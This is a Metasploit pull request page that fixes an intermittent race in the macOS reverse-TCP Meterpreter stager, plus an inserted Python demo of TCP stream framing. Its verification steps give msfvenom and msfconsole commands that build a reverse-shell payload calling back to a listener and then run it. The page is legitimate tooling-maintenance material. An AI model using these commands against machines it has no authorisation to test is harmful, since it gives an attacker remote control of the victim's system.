
Fix intermittent problem with native osx stager #11165

Merged
merged 4 commits into from Feb 7, 2019

timwr commented Dec 23, 2018

This fixes #11133

Sometimes part of the second stage is read by the first recv syscall:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/osx/x64/reverse_tcp.rb#L93
This means there is not enough data to complete the recv syscall in the second stage.

The simplest fix is to just sleep between the two stages.

Verification

The bug is intermittent, but if you run the osx stager about 10 times you should see it (let me know if you don't).

./msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 lport=4444 -f macho -o met
./msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp; set lhost 192.168.0.1; set lport 4444; set ExitOnSession false; run -j"
chmod +x met
./met (repeat 10 times)

This fix also includes a change to the osx stager that allows it to run successfully when a debugger is attached (e.g. lldb met).
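The race described above is a plain TCP stream-framing problem: a stream socket does not preserve message boundaries, so a recv sized for stage 1 can swallow the beginning of stage 2 and leave the next reader short. The following is an added illustration, not code from the pull request or from Metasploit; it constructs two stand-in stages, uses an assumed 4-byte length prefix for the demo, and contrasts the naive one-recv-per-stage reader with a read-exact loop (the general remedy, whereas the PR itself opts for a sleep between stages).

```python
import socket
import struct

# Constructed stand-in bytes for the two stages (not the real stager).
STAGE1 = b"\x90" * 64
STAGE2 = b"\xcc" * 300

def frame(msg: bytes) -> bytes:
    # Assumption for this demo: each stage is sent as a 4-byte LE length + body.
    return struct.pack("<I", len(msg)) + msg

def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes: a stream socket may hand back fewer bytes
    than one message, or (into a big buffer) bytes of the next one."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)}/{n} bytes")
        buf += chunk
    return bytes(buf)

def demo(split_at: int, robust: bool) -> dict:
    """Deliver stage 1 plus `split_at` bytes of stage 2 in one burst, then the
    rest, and read them back either naively (one recv per stage) or with
    recv_exact. Returns whether each stage was reconstructed intact."""
    sender, receiver = socket.socketpair()
    receiver.settimeout(1.0)
    wire = frame(STAGE1) + frame(STAGE2)
    cut = len(frame(STAGE1)) + split_at
    sender.sendall(wire[:cut])                 # stage 1 (+ head of stage 2) arrives first
    try:
        if robust:
            s1 = recv_exact(receiver, struct.unpack("<I", recv_exact(receiver, 4))[0])
            sender.sendall(wire[cut:])
            s2 = recv_exact(receiver, struct.unpack("<I", recv_exact(receiver, 4))[0])
        else:
            first = receiver.recv(4096)        # over-reads into stage 2; the tail is dropped
            s1 = first[4:4 + struct.unpack("<I", first[:4])[0]]
            sender.sendall(wire[cut:])
            try:
                second = receiver.recv(4096)   # only what was not already consumed
            except socket.timeout:
                second = b""                   # everything was eaten by the first recv
            s2 = second[4:4 + struct.unpack("<I", second[:4])[0]] if len(second) >= 4 else b""
    finally:
        sender.close()
        receiver.close()
    return {"stage1_ok": s1 == STAGE1, "stage2_ok": s2 == STAGE2}
```

`demo(0, False)` happens to work because the chunk boundary lines up with the message boundary, which is exactly why the original bug only shows up intermittently.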

@timwr timwr force-pushed the timwr:fix_11133 branch from b988a34 to 940f255 Dec 24, 2018

@busterb busterb self-assigned this Feb 7, 2019

@busterb busterb merged commit 940f255 into rapid7:master Feb 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request Feb 7, 2019

busterb commented Feb 7, 2019

Release Notes

This works around a reliability problem with the native macOS stager loading the second stage and the final payload.

jmartin-r7 added a commit that referenced this pull request Feb 7, 2019
